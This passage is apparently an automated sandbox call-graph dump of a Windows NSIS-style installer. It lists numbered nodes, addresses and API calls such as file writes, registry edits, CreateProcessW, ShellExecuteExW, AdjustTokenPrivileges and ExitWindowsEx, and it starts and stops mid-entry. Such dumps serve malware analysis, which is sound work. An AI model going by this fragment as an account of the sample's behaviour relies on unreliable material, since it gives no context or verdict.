4087 406694 GetModuleHandleA 4072->4087 4076 405842 GetLastError 4075->4076 4077 40583e 4075->4077 4076->4077 4078 405851 SetFileSecurityW 4076->4078 4077->4068 4078->4077 4079 405867 GetLastError 4078->4079 4079->4077 4081 405322 24 API calls 4080->4081 4082 401431 4081->4082 4083 4062ba lstrcpynW 4082->4083 4083->4067 4085 405882 GetLastError 4084->4085 4086 40587e 4084->4086 4085->4086 4086->4068 4088 4066b0 4087->4088 4089 4066ba GetProcAddress 4087->4089 4093 406624 GetSystemDirectoryW 4088->4093 4092 405892 4089->4092 4091 4066b6 4091->4089 4091->4092 4092->4068 4094 406646 wsprintfW LoadLibraryExW 4093->4094 4094->4091 4210 401e49 4211 402c1f 17 API calls 4210->4211 4212 401e4f 4211->4212 4213 402c1f 17 API calls 4212->4213 4214 401e5b 4213->4214 4215 401e72 EnableWindow 4214->4215 4216 401e67 ShowWindow 4214->4216 4217 402ac5 4215->4217 4216->4217 4218 40264a 4219 402c1f 17 API calls 4218->4219 4220 402659 4219->4220 4221 4026a3 ReadFile 4220->4221 4222 405e33 ReadFile 4220->4222 4223 4026e3 MultiByteToWideChar 4220->4223 4224 402798 4220->4224 4227 40273c 4220->4227 4228 402709 SetFilePointer MultiByteToWideChar 4220->4228 4229 4027a9 4220->4229 4231 402796 4220->4231 4221->4220 4221->4231 4222->4220 4223->4220 4241 406201 wsprintfW 4224->4241 4227->4220 4227->4231 4232 405e91 SetFilePointer 4227->4232 4228->4220 4230 4027ca SetFilePointer 4229->4230 4229->4231 4230->4231 4233 405ead 4232->4233 4240 405ec5 4232->4240 4234 405e33 ReadFile 4233->4234 4235 405eb9 4234->4235 4236 405ef6 SetFilePointer 4235->4236 4237 405ece SetFilePointer 4235->4237 4235->4240 4236->4240 4237->4236 4238 405ed9 4237->4238 4239 405e62 WriteFile 4238->4239 4239->4240 4240->4227 4241->4231 4965 4016cc 4966 402c41 17 API calls 4965->4966 4967 4016d2 GetFullPathNameW 4966->4967 4968 4016ec 4967->4968 4974 40170e 4967->4974 4970 4065fd 2 API calls 4968->4970 4968->4974 4969 401723 GetShortPathNameW 4972 402ac5 4969->4972 4971 4016fe 4970->4971 4971->4974 4975 4062ba lstrcpynW 4971->4975 4974->4969 4974->4972 4975->4974 4252 40234e 4253 402c41 17 API calls 4252->4253 4254 40235d 4253->4254 4255 402c41 17 API calls 4254->4255 4256 402366 4255->4256 4257 402c41 17 API calls 4256->4257 4258 402370 GetPrivateProfileStringW 4257->4258 4976 73cf18dd 4977 73cf1900 4976->4977 4978 73cf1935 GlobalFree 4977->4978 4979 73cf1947 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 4977->4979 4978->4979 4980 73cf1272 2 API calls 4979->4980 4981 73cf1ad2 GlobalFree GlobalFree 4980->4981 4982 401b53 4983 402c41 17 API calls 4982->4983 4984 401b5a 4983->4984 4985 402c1f 17 API calls 4984->4985 4986 401b63 wsprintfW 4985->4986 4987 402ac5 4986->4987 4988 401956 4989 402c41 17 API calls 4988->4989 4990 40195d lstrlenW 4989->4990 4991 402592 4990->4991 4992 4014d7 4993 402c1f 17 API calls 4992->4993 4994 4014dd Sleep 4993->4994 4996 402ac5 4994->4996 4997 73cf16d8 4998 73cf1707 4997->4998 4999 73cf1b63 22 API calls 4998->4999 5000 73cf170e 4999->5000 5001 73cf1715 5000->5001 5002 73cf1721 5000->5002 5003 73cf1272 2 API calls 5001->5003 5004 73cf172b 5002->5004 5005 73cf1748 5002->5005 5008 73cf171f 5003->5008 5009 73cf153d 3 API calls 5004->5009 5006 73cf174e 5005->5006 5007 73cf1772 5005->5007 5012 73cf1272 2 API calls 5006->5012 5010 73cf153d 3 API calls 5007->5010 5011 73cf1730 5009->5011 5010->5008 5014 73cf1272 2 API calls 5011->5014 5013 73cf1759 GlobalFree 5012->5013 5013->5008 5016 73cf176d GlobalFree 5013->5016 5015 73cf173c GlobalFree 5014->5015 5015->5008 5016->5008 5017 73cf1058 5019 73cf1074 5017->5019 5018 73cf10dd 5019->5018 5020 73cf1092 5019->5020 5030 73cf1516 5019->5030 5022 73cf1516 GlobalFree 5020->5022 5023 73cf10a2 5022->5023 5024 73cf10a9 GlobalSize 5023->5024 5025 73cf10b2 5023->5025 5024->5025 5026 73cf10c7 5025->5026 5027 73cf10b6 GlobalAlloc 5025->5027 5029 73cf10d2 GlobalFree 5026->5029 5028 73cf153d 3 API calls 5027->5028 5028->5026 5029->5018 5032 73cf151c 5030->5032 5031 73cf1522 5031->5020 5032->5031 5033 73cf152e GlobalFree 5032->5033 5033->5020 4785 403d58 4786 403d70 4785->4786 4787 403eab 4785->4787 4786->4787 4790 403d7c 4786->4790 4788 403efc 4787->4788 4789 403ebc GetDlgItem GetDlgItem 4787->4789 4792 403f56 4788->4792 4802 401389 2 API calls 4788->4802 4791 404231 18 API calls 4789->4791 4793 403d87 SetWindowPos 4790->4793 4794 403d9a 4790->4794 4797 403ee6 SetClassLongW 4791->4797 4798 40427d SendMessageW 4792->4798 4817 403ea6 4792->4817 4793->4794 4795 403db7 4794->4795 4796 403d9f ShowWindow 4794->4796 4799 403dd9 4795->4799 4800 403dbf DestroyWindow 4795->4800 4796->4795 4801 40140b 2 API calls 4797->4801 4826 403f68 4798->4826 4804 403dde SetWindowLongW 4799->4804 4805 403def 4799->4805 4803 4041db 4800->4803 4801->4788 4806 403f2e 4802->4806 4812 4041eb ShowWindow 4803->4812 4803->4817 4804->4817 4809 403e98 4805->4809 4810 403dfb GetDlgItem 4805->4810 4806->4792 4811 403f32 SendMessageW 4806->4811 4807 40140b 2 API calls 4807->4826 4808 4041bc DestroyWindow EndDialog 4808->4803 4866 404298 4809->4866 4813 403e2b 4810->4813 4814 403e0e SendMessageW IsWindowEnabled 4810->4814 4811->4817 4812->4817 4818 403e38 4813->4818 4821 403e7f SendMessageW 4813->4821 4822 403e4b 4813->4822 4829 403e30 4813->4829 4814->4813 4814->4817 4816 4062dc 17 API calls 4816->4826 4818->4821 4818->4829 4820 404231 18 API calls 4820->4826 4821->4809 4823 403e53 4822->4823 4824 403e68 4822->4824 4827 40140b 2 API calls 4823->4827 4828 40140b 2 API calls 4824->4828 4825 403e66 4825->4809 4826->4807 4826->4808 4826->4816 4826->4817 4826->4820 4847 4040fc DestroyWindow 4826->4847 4857 404231 4826->4857 4827->4829 4830 403e6f 4828->4830 4863 40420a 4829->4863 4830->4809 4830->4829 4832 403fe3 GetDlgItem 4833 404000 ShowWindow KiUserCallbackDispatcher 4832->4833 4834 403ff8 4832->4834 4860 404253 EnableWindow 4833->4860 4834->4833 4836 40402a EnableWindow 4841 40403e 4836->4841 4837 404043 GetSystemMenu EnableMenuItem SendMessageW 4838 404073 SendMessageW 4837->4838 4837->4841 4838->4841 4840 403d39 18 API calls 4840->4841 4841->4837 4841->4840 4861 404266 SendMessageW 4841->4861 4862 4062ba lstrcpynW 4841->4862 4843 4040a2 lstrlenW 4844 4062dc 17 API calls 4843->4844 4845 4040b8 SetWindowTextW 4844->4845 4846 401389 2 API calls 4845->4846 4846->4826 4847->4803 4848 404116 CreateDialogParamW 4847->4848 4848->4803 4849 404149 4848->4849 4850 404231 18 API calls 4849->4850 4851 404154 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4850->4851 4852 401389 2 API calls 4851->4852 4853 40419a 4852->4853 4853->4817 4854 4041a2 ShowWindow 4853->4854 4855 40427d SendMessageW 4854->4855 4856 4041ba 4855->4856 4856->4803 4858 4062dc 17 API calls 4857->4858 4859 40423c SetDlgItemTextW 4858->4859 4859->4832 4860->4836 4861->4841 4862->4843 4864 404211 4863->4864 4865 404217 SendMessageW 4863->4865 4864->4865 4865->4825 4867 40435b 4866->4867 4868 4042b0 GetWindowLongW 4866->4868 4867->4817 4868->4867 4869 4042c5 4868->4869 4869->4867 4870 4042f2 GetSysColor 4869->4870 4871 4042f5 4869->4871 4870->4871 4872 404305 SetBkMode 4871->4872 4873 4042fb SetTextColor 4871->4873 4874 404323 4872->4874 4875 40431d GetSysColor 4872->4875 4873->4872 4876 404334 4874->4876 4877 40432a SetBkColor 4874->4877 4875->4874 4876->4867 4878 404347 DeleteObject 4876->4878 4879 40434e CreateBrushIndirect 4876->4879 4877->4876 4878->4879 4879->4867 5034 401f58 5035 402c41 17 API calls 5034->5035 5036 401f5f 5035->5036 5037 4065fd 2 API calls 5036->5037 5038 401f65 5037->5038 5040 401f76 5038->5040 5041 406201 wsprintfW 5038->5041 5041->5040 5042 402259 5043 402c41 17 API calls 5042->5043 5044 40225f 5043->5044 5045 402c41 17 API calls 5044->5045 5046 402268 5045->5046 5047 402c41 17 API calls 5046->5047 5048 402271 5047->5048 5049 4065fd 2 API calls 5048->5049 5050 40227a 5049->5050 5051 40228b lstrlenW lstrlenW 5050->5051 5052 40227e 5050->5052 5053 405322 24 API calls 5051->5053 5054 405322 24 API calls 5052->5054 5055 4022c9 SHFileOperationW 5053->5055 5056 402286 5054->5056 5055->5052 5055->5056 5057 4046db 5058 404711 5057->5058 5059 4046eb 5057->5059 5061 404298 8 API calls 5058->5061 5060 404231 18 API calls 5059->5060 5062 4046f8 SetDlgItemTextW 5060->5062 5063 40471d 5061->5063 5062->5058 4883 40175c 4884 402c41 17 API calls 4883->4884 4885 401763 4884->4885 4886 405ddf 2 API calls 4885->4886 4887 40176a 4886->4887 4888 405ddf 2 API calls 4887->4888 4888->4887 5064 4022dd 5065 4022e4 5064->5065 5068 4022f7 5064->5068 5066 4062dc 17 API calls 5065->5066 5067 4022f1 5066->5067 5069 405920 MessageBoxIndirectW 5067->5069 5069->5068 5070 4028dd 5092 405db0 GetFileAttributesW CreateFileW 5070->5092 5072 4028e4 5073 4028f0 GlobalAlloc 5072->5073 5074 402987 5072->5074 5075 402909 5073->5075 5076 40297e CloseHandle 5073->5076 5077 4029a2 5074->5077 5078 40298f DeleteFileW 5074->5078 5093 403347 SetFilePointer 5075->5093 5076->5074 5078->5077 5080 40290f 5081 403331 ReadFile 5080->5081 5082 402918 GlobalAlloc 5081->5082 5083 402928 5082->5083 5084 40295c 5082->5084 5085 403116 31 API calls 5083->5085 5086 405e62 WriteFile 5084->5086 5091 402935 5085->5091 5087 402968 GlobalFree 5086->5087 5088 403116 31 API calls 5087->5088 5090 40297b 5088->5090 5089 402953 GlobalFree 5089->5084 5090->5076 5091->5089 5092->5072 5093->5080 5094 401d5d GetDlgItem GetClientRect 5095 402c41 17 API calls 5094->5095 5096 401d8f LoadImageW SendMessageW 5095->5096 5097 401dad DeleteObject 5096->5097 5098 402ac5 5096->5098 5097->5098 5099 405461 5100 405482 GetDlgItem GetDlgItem GetDlgItem 5099->5100 5101 40560b 5099->5101 5144 404266 SendMessageW 5100->5144 5103 405614 GetDlgItem CreateThread CloseHandle 5101->5103 5104 40563c 5101->5104 5103->5104 5106 405667 5104->5106 5107 405653 ShowWindow ShowWindow 5104->5107 5108 40568c 5104->5108 5105 4054f2 5113 4054f9 GetClientRect GetSystemMetrics SendMessageW SendMessageW 5105->5113 5110 4056a1 ShowWindow 5106->5110 5111 40567b 5106->5111 5114 4056c7 5106->5114 5146 404266 SendMessageW 5107->5146 5112 404298 8 API calls 5108->5112 5117 4056c1 5110->5117 5118 4056b3 5110->5118 5115 40420a SendMessageW 5111->5115 5116 40569a 5112->5116 5119 405567 5113->5119 5120 40554b SendMessageW SendMessageW 5113->5120 5114->5108 5121 4056d5 SendMessageW 5114->5121 5115->5108 5126 40420a SendMessageW 5117->5126 5125 405322 24 API calls 5118->5125 5122 40557a 5119->5122 5123 40556c SendMessageW 5119->5123 5120->5119 5121->5116 5124 4056ee CreatePopupMenu 5121->5124 5128 404231 18 API calls 5122->5128 5123->5122 5127 4062dc 17 API calls 5124->5127 5125->5117 5126->5114 5129 4056fe AppendMenuW 5127->5129 5130 40558a 5128->5130 5131 40571b GetWindowRect 5129->5131 5132 40572e TrackPopupMenu 5129->5132 5133 405593 ShowWindow 5130->5133 5134 4055c7 GetDlgItem SendMessageW 5130->5134 5131->5132 5132->5116 5135 405749 5132->5135 5136 4055b6 5133->5136 5137 4055a9 ShowWindow 5133->5137 5134->5116 5138 4055ee SendMessageW SendMessageW 5134->5138 5139 405765 SendMessageW 5135->5139 5145 404266 SendMessageW 5136->5145 5137->5136 5138->5116 5139->5139 5140 405782 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5139->5140 5142 4057a7 SendMessageW 5140->5142 5142->5142 5143 4057d0 GlobalUnlock SetClipboardData CloseClipboard 5142->5143 5143->5116 5144->5105 5145->5134 5146->5106 5147 401563 5148 402a6b 5147->5148 5151 406201 wsprintfW 5148->5151 5150 402a70 5151->5150 4096 4023e4 4097 402c41 17 API calls 4096->4097 4098 4023f6 4097->4098 4099 402c41 17 API calls 4098->4099 4100 402400 4099->4100 4113 402cd1 4100->4113 4103 40288b 4104 402438 4106 402444 4104->4106 4117 402c1f 4104->4117 4105 402c41 17 API calls 4107 40242e lstrlenW 4105->4107 4109 402463 RegSetValueExW 4106->4109 4120 403116 4106->4120 4107->4104 4111 402479 RegCloseKey 4109->4111 4111->4103 4114 402cec 4113->4114 4140 406155 4114->4140 4118 4062dc 17 API calls 4117->4118 4119 402c34 4118->4119 4119->4106 4121 40312f 4120->4121 4122 40315d 4121->4122 4147 403347 SetFilePointer 4121->4147 4144 403331 4122->4144 4126 4032ca 4129 40330c 4126->4129 4132 4032ce 4126->4132 4127 40317a GetTickCount 4128 4032b4 4127->4128 4136 4031c9 4127->4136 4128->4109 4131 403331 ReadFile 4129->4131 4130 403331 ReadFile 4130->4136 4131->4128 4132->4128 4133 403331 ReadFile 4132->4133 4134 405e62 WriteFile 4132->4134 4133->4132 4134->4132 4135 40321f GetTickCount 4135->4136 4136->4128 4136->4130 4136->4135 4137 403244 MulDiv wsprintfW 4136->4137 4139 405e62 WriteFile 4136->4139 4138 405322 24 API calls 4137->4138 4138->4136 4139->4136 4141 406164 4140->4141 4142 402410 4141->4142 4143 40616f RegCreateKeyExW 4141->4143 4142->4103 4142->4104 4142->4105 4143->4142 4145 405e33 ReadFile 4144->4145 4146 403168 4145->4146 4146->4126 4146->4127 4146->4128 4147->4122 4181 4058e6 ShellExecuteExW 5152 404367 lstrcpynW lstrlenW 5153 402868 5154 402c41 17 API calls 5153->5154 5155 40286f FindFirstFileW 5154->5155 5156 402882 5155->5156 5157 402897 5155->5157 5161 406201 wsprintfW 5157->5161 5159 4028a0 5162 4062ba lstrcpynW 5159->5162 5161->5159 5162->5156 5163 401968 5164 402c1f 17 API calls 5163->5164 5165 40196f 5164->5165 5166 402c1f 17 API calls 5165->5166 5167 40197c 5166->5167 5168 402c41 17 API calls 5167->5168 5169 401993 lstrlenW 5168->5169 5170 4019a4 5169->5170 5171 4019e5 5170->5171 5175 4062ba lstrcpynW 5170->5175 5173 4019d5 5173->5171 5174 4019da lstrlenW 5173->5174 5174->5171 5175->5173 5176 403968 5177 403973 5176->5177 5178 403977 5177->5178 5179 40397a GlobalAlloc 5177->5179 5179->5178 5180 40166a 5181 402c41 17 API calls 5180->5181 5182 401670 5181->5182 5183 4065fd 2 API calls 5182->5183 5184 401676 5183->5184 5185 73cf10e1 5186 73cf1111 5185->5186 5187 73cf11d8 GlobalFree 5186->5187 5188 73cf12ba 2 API calls 5186->5188 5189 73cf11d3 5186->5189 5190 73cf11f8 GlobalFree 5186->5190 5191 73cf1272 2 API calls 5186->5191 5192 73cf1164 GlobalAlloc 5186->5192 5193 73cf12e1 lstrcpyW 5186->5193 5194 73cf11c4 GlobalFree 5186->5194 5188->5186 5189->5187 5190->5186 5191->5194 5192->5186 5193->5186 5194->5186 4259 4027ef 4260 4027f6 4259->4260 4263 402a70 4259->4263 4261 402c1f 17 API calls 4260->4261 4262 4027fd 4261->4262 4264 40280c SetFilePointer 4262->4264 4264->4263 4265 40281c 4264->4265 4267 406201 wsprintfW 4265->4267 4267->4263 4268 40176f 4269 402c41 17 API calls 4268->4269 4270 401776 4269->4270 4271 401796 4270->4271 4272 40179e 4270->4272 4308 4062ba lstrcpynW 4271->4308 4309 4062ba lstrcpynW 4272->4309 4275 40179c 4279 40654e 5 API calls 4275->4279 4276 4017a9 4277 405b8f 3 API calls 4276->4277 4278 4017af lstrcatW 4277->4278 4278->4275 4284 4017bb 4279->4284 4280 4065fd 2 API calls 4280->4284 4281 4017f7 4282 405d8b 2 API calls 4281->4282 4282->4284 4284->4280 4284->4281 4285 4017cd CompareFileTime 4284->4285 4286 40188d 4284->4286 4293 4062dc 17 API calls 4284->4293 4298 4062ba lstrcpynW 4284->4298 4304 401864 4284->4304 4307 405db0 GetFileAttributesW CreateFileW 4284->4307 4310 405920 4284->4310 4285->4284 4287 405322 24 API calls 4286->4287 4289 401897 4287->4289 4288 405322 24 API calls 4306 401879 4288->4306 4290 403116 31 API calls 4289->4290 4291 4018aa 4290->4291 4292 4018be SetFileTime 4291->4292 4294 4018d0 CloseHandle 4291->4294 4292->4294 4293->4284 4295 4018e1 4294->4295 4294->4306 4296 4018e6 4295->4296 4297 4018f9 4295->4297 4299 4062dc 17 API calls 4296->4299 4300 4062dc 17 API calls 4297->4300 4298->4284 4301 4018ee lstrcatW 4299->4301 4302 401901 4300->4302 4301->4302 4305 405920 MessageBoxIndirectW 4302->4305 4304->4288 4304->4306 4305->4306 4307->4284 4308->4275 4309->4276 4311 405935 4310->4311 4312 405981 4311->4312 4313 405949 MessageBoxIndirectW 4311->4313 4312->4284 4313->4312 5195 4043f0 5196 404408 5195->5196 5200 404522 5195->5200 5201 404231 18 API calls 5196->5201 5197 40458c 5198 404656 5197->5198 5199 404596 GetDlgItem 5197->5199 5205 404298 8 API calls 5198->5205 5202 404617 5199->5202 5206 4045b0 5199->5206 5200->5197 5200->5198 5203 40455d GetDlgItem SendMessageW 5200->5203 5204 40446f 5201->5204 5202->5198 5207 404629 5202->5207 5228 404253 EnableWindow 5203->5228 5209 404231 18 API calls 5204->5209 5210 404651 5205->5210 5206->5202 5211 4045d6 SendMessageW LoadCursorW SetCursor 5206->5211 5212 40463f 5207->5212 5213 40462f SendMessageW 5207->5213 5215 40447c CheckDlgButton 5209->5215 5232 40469f 5211->5232 5212->5210 5217 404645 SendMessageW 5212->5217 5213->5212 5214 404587 5229 40467b 5214->5229 5226 404253 EnableWindow 5215->5226 5217->5210 5221 40449a GetDlgItem 5227 404266 SendMessageW 5221->5227 5223 4044b0 SendMessageW 5224 4044d6 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5223->5224 5225 4044cd GetSysColor 5223->5225 5224->5210 5225->5224 5226->5221 5227->5223 5228->5214 5230 404689 5229->5230 5231 40468e SendMessageW 5229->5231 5230->5231 5231->5197 5235 4058e6 ShellExecuteExW 5232->5235 5234 404605 LoadCursorW SetCursor 5234->5202 5235->5234 5236 401a72 5237 402c1f 17 API calls 5236->5237 5238 401a7b 5237->5238 5239 402c1f 17 API calls 5238->5239 5240 401a20 5239->5240 5241 401cf3 5242 402c1f 17 API calls 5241->5242 5243 401cf9 IsWindow 5242->5243 5244 401a20 5243->5244 5245 401573 5246 401583 ShowWindow 5245->5246 5247 40158c 5245->5247 5246->5247 5248 402ac5 5247->5248 5249 40159a ShowWindow 5247->5249 5249->5248 5250 402df3 5251 402e05 SetTimer 5250->5251 5253 402e1e 5250->5253 5251->5253 5252 402e73 5253->5252 5254 402e38 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5253->5254 5254->5252 5255 4014f5 SetForegroundWindow 5256 402ac5 5255->5256 5257 402576 5258 402c41 17 API calls 5257->5258 5259 40257d 5258->5259 5262 405db0 GetFileAttributesW CreateFileW 5259->5262 5261 402589 5262->5261 5263 401b77 5264 401b84 5263->5264 5265 401bc8 5263->5265 5266 401c0d 5264->5266 5271 401b9b 5264->5271 5267 401bf2 GlobalAlloc 5265->5267 5268 401bcd 5265->5268 5269 4062dc 17 API calls 5266->5269 5278 4022f7 5266->5278 5270 4062dc 17 API calls 5267->5270 5268->5278 5284 4062ba lstrcpynW 5268->5284 5273 4022f1 5269->5273 5270->5266 5282 4062ba lstrcpynW 5271->5282 5276 405920 MessageBoxIndirectW 5273->5276 5275 401bdf GlobalFree 5275->5278 5276->5278 5277 401baa 5283 4062ba lstrcpynW 5277->5283 5280 401bb9 5285 4062ba lstrcpynW 5280->5285 5282->5277 5283->5280 5284->5275 5285->5278 5286 404a78 5287 404aa4 5286->5287 5288 404a88 5286->5288 5290 404ad7 5287->5290 5291 404aaa SHGetPathFromIDListW 5287->5291 5297 405904 GetDlgItemTextW 5288->5297 5293 404ac1 SendMessageW 5291->5293 5294 404aba 5291->5294 5292 404a95 SendMessageW 5292->5287 5293->5290 5295 40140b 2 API calls 5294->5295 5295->5293 5297->5292 5298 4024f8 5299 402c81 17 API calls 5298->5299 5300 402502 5299->5300 5301 402c1f 17 API calls 5300->5301 5302 40250b 5301->5302 5303 402533 RegEnumValueW 5302->5303 5304 402527 RegEnumKeyW 5302->5304 5306 40288b 5302->5306 5305 402548 RegCloseKey 5303->5305 5304->5305 5305->5306 5308 40167b 5309 402c41 17 API calls 5308->5309 5310 401682 5309->5310 5311 402c41 17 API calls 5310->5311 5312 40168b 5311->5312 5313 402c41 17 API calls 5312->5313 5314 401694 MoveFileW 5313->5314 5315 4016a7 5314->5315 5321 4016a0 5314->5321 5316 4065fd 2 API calls 5315->5316 5319 402250 5315->5319 5318 4016b6 5316->5318 5317 401423 24 API calls 5317->5319 5318->5319 5320 406080 36 API calls 5318->5320 5320->5321 5321->5317 5322 401e7d 5323 402c41 17 API calls 5322->5323 5324 401e83 5323->5324 5325 402c41 17 API calls 5324->5325 5326 401e8c 5325->5326 5327 402c41 17 API calls 5326->5327 5328 401e95 5327->5328 5329 402c41 17 API calls 5328->5329 5330 401e9e 5329->5330 5331 401423 24 API calls 5330->5331 5332 401ea5 5331->5332 5339 4058e6 ShellExecuteExW 5332->5339 5334 401ee7 5335 406745 5 API calls 5334->5335 5336 40288b 5334->5336 5337 401f01 CloseHandle 5335->5337 5337->5336 5339->5334 5340 73cf1671 5341 73cf1516 GlobalFree 5340->5341 5342 73cf1689 5341->5342 5343 73cf16cf GlobalFree 5342->5343 5344 73cf16a4 5342->5344 5345 73cf16bb VirtualFree 5342->5345 5344->5343 5345->5343 5346 4019ff 5347 402c41 17 API calls 5346->5347 5348 401a06 5347->5348 5349 402c41 17 API calls 5348->5349 5350 401a0f 5349->5350 5351 401a16 lstrcmpiW 5350->5351 5352 401a28 lstrcmpW 5350->5352 5353 401a1c 5351->5353 5352->5353 5354 401000 5355 401037 BeginPaint GetClientRect 5354->5355 5356 40100c DefWindowProcW 5354->5356 5358 4010f3 5355->5358 5359 401179 5356->5359 5360 401073 CreateBrushIndirect FillRect DeleteObject 5358->5360 5361 4010fc 5358->5361 5360->5358 5362 401102 CreateFontIndirectW 5361->5362 5363 401167 EndPaint 5361->5363 5362->5363 5364 401112 6 API calls 5362->5364 5363->5359 5364->5363 5365 401503 5366 40150b 5365->5366 5368 40151e 5365->5368 5367 402c1f 17 API calls 5366->5367 5367->5368 4148 402104 4149 402c41 17 API calls 4148->4149 4150 40210b 4149->4150 4151 402c41 17 API calls 4150->4151 4152 402115 4151->4152 4153 402c41 17 API calls 4152->4153 4154 40211f 4153->4154 4155 402c41 17 API calls 4154->4155 4156 402129 4155->4156 4157 402c41 17 API calls 4156->4157 4159 402133 4157->4159 4158 402172 CoCreateInstance 4163 402191 4158->4163 4159->4158 4160 402c41 17 API calls 4159->4160 4160->4158 4161 401423 24 API calls 4162 402250 4161->4162 4163->4161 4163->4162 4164 402484 4175 402c81 4164->4175 4167 402c41 17 API calls 4168 402497 4167->4168 4169 4024a2 RegQueryValueExW 4168->4169 4172 40288b 4168->4172 4170 4024c8 RegCloseKey 4169->4170 4171 4024c2 4169->4171 4170->4172 4171->4170 4180 406201 wsprintfW 4171->4180 4176 402c41 17 API calls 4175->4176 4177 402c98 4176->4177 4178 406127 RegOpenKeyExW 4177->4178 4179 40248e 4178->4179 4179->4167 4180->4170 4182 401f06 4183 402c41 17 API calls 4182->4183 4184 401f0c 4183->4184 4185 405322 24 API calls 4184->4185 4186 401f16 4185->4186 4197 4058a3 CreateProcessW 4186->4197 4189 401f3f CloseHandle 4193 40288b 4189->4193 4192 401f31 4194 401f41 4192->4194 4195 401f36 4192->4195 4194->4189 4205 406201 wsprintfW 4195->4205 4198 401f1c 4197->4198 4199 4058d6 CloseHandle 4197->4199 4198->4189 4198->4193 4200 406745 WaitForSingleObject 4198->4200 4199->4198 4201 40675f 4200->4201 4202 406771 GetExitCodeProcess 4201->4202 4206 4066d0 4201->4206 4202->4192 4205->4189 4207 4066ed PeekMessageW 4206->4207 4208 4066e3 DispatchMessageW 4207->4208 4209 4066fd WaitForSingleObject 4207->4209 4208->4207 4209->4201 4242 40230c 4243 402314 4242->4243 4244 40231a 4242->4244 4245 402c41 17 API calls 4243->4245 4246 402328 4244->4246 4247 402c41 17 API calls 4244->4247 4245->4244 4248 402c41 17 API calls 4246->4248 4250 402336 4246->4250 4247->4246 4248->4250 4249 402c41 17 API calls 4251 40233f WritePrivateProfileStringW 4249->4251 4250->4249 5369 40190c 5370 401943 5369->5370 5371 402c41 17 API calls 5370->5371 5372 401948 5371->5372 5373 4059cc 67 API calls 5372->5373 5374 401951 5373->5374 5375 401f8c 5376 402c41 17 API calls 5375->5376 5377 401f93 5376->5377 5378 406694 5 API calls 5377->5378 5379 401fa2 5378->5379 5380 402026 5379->5380 5381 401fbe GlobalAlloc 5379->5381 5381->5380 5382 401fd2 5381->5382 5383 406694 5 API calls 5382->5383 5384 401fd9 5383->5384 5385 406694 5 API calls 5384->5385 5386 401fe3 5385->5386 5386->5380 5390 406201 wsprintfW 5386->5390 5388 402018 5391 406201 wsprintfW 5388->5391 5390->5388 5391->5380 5392 73cf2301 5393 73cf236b 5392->5393 5394 73cf2376 GlobalAlloc 5393->5394 5395 73cf2395 5393->5395 5394->5393 5396 40238e 5397 4023c1 5396->5397 5398 402396 5396->5398 5400 402c41 17 API calls 5397->5400 5399 402c81 17 API calls 5398->5399 5401 40239d 5399->5401 5402 4023c8 5400->5402 5404 402c41 17 API calls 5401->5404 5405 4023d5 5401->5405 5407 402cff 5402->5407 5406 4023ae RegDeleteValueW RegCloseKey 5404->5406 5406->5405 5408 402d13 5407->5408 5409 402d0c 5407->5409 5408->5409 5411 402d44 5408->5411 5409->5405 5412 406127 RegOpenKeyExW 5411->5412 5417 402d72 5412->5417 5413 402d98 RegEnumKeyW 5414 402daf RegCloseKey 5413->5414 5413->5417 5415 406694 5 API calls 5414->5415 5418 402dbf 5415->5418 5416 402dd0 RegCloseKey 5421 402dc3 5416->5421 5417->5413 5417->5414 5417->5416 5419 402d44 6 API calls 5417->5419 5417->5421 5420 402de0 RegDeleteKeyW 5418->5420 5418->5421 5419->5417 5420->5421 5421->5409 4314 40338f SetErrorMode GetVersion 4315 4033ce 4314->4315 4316 4033d4 4314->4316 4317 406694 5 API calls 4315->4317 4318 406624 3 API calls 4316->4318 4317->4316 4319 4033ea lstrlenA 4318->4319 4319->4316 4320 4033fa 4319->4320 4321 406694 5 API calls 4320->4321 4322 403401 4321->4322 4323 406694 5 API calls 4322->4323 4324 403408 4323->4324 4325 406694 5 API calls 4324->4325 4326 403414 #17 OleInitialize SHGetFileInfoW 4325->4326 4404 4062ba lstrcpynW 4326->4404 4329 403460 GetCommandLineW 4405 4062ba lstrcpynW 4329->4405 4331 403472 4332 405bbc CharNextW 4331->4332 4333 403497 CharNextW 4332->4333 4334 4035c1 GetTempPathW 4333->4334 4344 4034b0 4333->4344 4406 40335e 4334->4406 4336 4035d9 4337 403633 DeleteFileW 4336->4337 4338 4035dd GetWindowsDirectoryW lstrcatW 4336->4338 4416 402edd GetTickCount GetModuleFileNameW 4337->4416 4341 40335e 12 API calls 4338->4341 4339 405bbc CharNextW 4339->4344 4343 4035f9 4341->4343 4342 403647 4352 405bbc CharNextW 4342->4352 4386 4036ea 4342->4386 4399 4036fa 4342->4399 4343->4337 4345 4035fd GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4343->4345 4344->4339 4346 4035ac 4344->4346 4348 4035aa 4344->4348 4347 40335e 12 API calls 4345->4347 4500 4062ba lstrcpynW 4346->4500 4350 40362b 4347->4350 4348->4334 4350->4337 4350->4399 4361 403666 4352->4361 4355 403834 4357 40383c GetCurrentProcess OpenProcessToken 4355->4357 4362 4038b8 ExitProcess 4355->4362 4356 403714 4358 405920 MessageBoxIndirectW 4356->4358 4359 403854 LookupPrivilegeValueW AdjustTokenPrivileges 4357->4359 4360 403888 4357->4360 4366 403722 ExitProcess 4358->4366 4359->4360 4369 406694 5 API calls 4360->4369 4364 4036c4 4361->4364 4365 40372a 4361->4365 4367 405c97 18 API calls 4364->4367 4368 40588b 5 API calls 4365->4368 4370 4036d0 4367->4370 4371 40372f lstrcatW 4368->4371 4372 40388f 4369->4372 4370->4399 4501 4062ba lstrcpynW 4370->4501 4373 403740 lstrcatW 4371->4373 4374 40374b lstrcatW lstrcmpiW 4371->4374 4375 4038a4 ExitWindowsEx 4372->4375 4378 4038b1 4372->4378 4373->4374 4377 403767 4374->4377 4374->4399 4375->4362 4375->4378 4380 403773 4377->4380 4381 40376c 4377->4381 4512 40140b 4378->4512 4379 4036df 4502 4062ba lstrcpynW 4379->4502 4385 40586e 2 API calls 4380->4385 4384 4057f1 4 API calls 4381->4384 4387 403771 4384->4387 4388 403778 SetCurrentDirectoryW 4385->4388 4444 4039aa 4386->4444 4387->4388 4389 403793 4388->4389 4390 403788 4388->4390 4511 4062ba lstrcpynW 4389->4511 4510 4062ba lstrcpynW 4390->4510 4393 4062dc 17 API calls 4394 